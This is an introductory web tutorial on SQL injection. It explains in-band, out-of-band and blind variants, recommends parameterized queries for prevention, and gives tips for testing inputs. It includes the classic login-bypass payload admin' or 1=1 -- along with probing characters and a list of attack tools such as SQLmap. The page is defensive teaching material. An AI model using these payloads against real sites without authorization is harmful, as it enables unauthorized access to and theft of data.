SQL Injection Tutorial

What Is SQL Injection?

SQL injection is a technique used by hackers to get access to your data.  It basically involves hackers taking advantage of user inputs on web pages in order to execute SQL statements against your database.

If the input isn’t validated properly, the hacker can enter carefully constructed data with the effect being that the SQL that’s executed against your database is altered to have unintended consequences (from your point of view; the consequences are obviously intended from the hacker’s perspective!). These consequences could be the hacker gaining access to your confidential data, your data being wiped, and so on.

SQL injection attack is one of the most common types of internet hacks and so it’s important that it’s understood and tested for by developers and those responsible for security. This quick SQL injection tutorial is intended to give a brief and easy to understand overview of the issue.

Types Of SQL Injection

There are three general types of SQL injection attacks:

  • Query changing and redirection where the data is returned directly to the web page – see the SQL injection example below. This is known as “In Band” SQL injection.
  • So-called “Out of Band” SQL injection – this is where the data is retrieved through a different medium than the application. For example, if an administrator has configured a system to email them when certain events occur, then a hacker can use this email functionality to email themselves the data.
  • Blind SQL injection – in this case, the hacker effectively asks the database questions that have a true or false answer and deduces information based on how the application responds.

SQL Injection Example

As a SQL injection example, consider a web application login screen where the user is prompted to enter their username and password. The application will then build a SQL query using the entered data such as:

select username, password from users where username = “‘” + entered_username + “‘” and password = “‘” + entered_password + “‘”;

So the end result will be a query such as:

select username, password from users where username =’Dave’ and password = ‘DBADave’;

Now if the application doesn’t do any validation of the data entered before building this SQL query, then the hacker could enter the following for the username and password:

admin’ or 1=1 —

(It doesn’t display too well on the internet but the — part is actually two dashes, which is a comment in SQL syntax so you are effectively commenting out the rest of the SQL statement)

This would then result in the SQL query looking like this:

select username, password from users where username = ‘admin’ or 1=1 — and password = ‘admin’ or 1=1 –‘;

As the “1=1” part of the where clause is always true, this query will return all records from the users table.

Of course it’s important to remember that a login screen isn’t the only part of an application that’s vulnerable. Any screen that allows user input and then builds a query string to query the database is potentially vulnerable to SQL injection.

How To Prevent SQL Injection

The first thing developers can do to help prevent SQL injection is to use prepared statements with parameterized queries. When you do this, the hacker is not able to execute any injected SQL as the literal value of the data they enter is passed as the parameter. In the above example, the application would look for a username of “admin or 1=1 —“. Similarly, stored procedures can be used with the same result too. Note, that it’s not enough just to say you used stored procedures so your code is safe from SQL injection, you still need to consider security.

The input data can also be validated before the SQL query is built. For example, if a date value is expected to be input, check that a valid date has indeed been entered.

Testing If A Site Is Vulnerable To SQL Injection

When testing if a site is vulnerable to SQL injection, you have to make a list of all possible input fields where the input data could potentially be used for an attack. This includes all hidden POST requests. Then each possibility needs to be individually tested.

Areas that are potentially vulnerable include authentication forms such as login screens and any field where the user can enter data that will be used to query the database.

When testing for vulnerability, the first test is normally to append a single quote (‘) to the end of the input data. A semi-colon (;) can also be used as this will also invalidate any SQL that is passed to the database.

What you are looking to see is if the application just constructs a query string using the entered data without doing any validation, and without using prepared statements. If the application returns an error or shows some other unexpected behaviour, then this means your site is vulnerable.

Other data that can be used to test include comments, constructs such as AND and OR, and you can also test by entering a text string into a field that is expecting a number. Again, if the application displays a SQL error then this means your data is being used directly in the query and your application is vulnerable to SQL injection.

This is only a brief overview of the sort of testing you need to do (which is a lot!). Luckily there are tools available that can automate SQL injection testing for you. There are even online testing tools available, such as this one.

Open Source SQL Injection Testing Tools

Here’s a brief list of some of the available open source tools you can use for SQL injection testing:

BSQL Hacker
Mole
Safe3 SQL Injector
SQLmap
SQLninja
SQLSus

Leave a Comment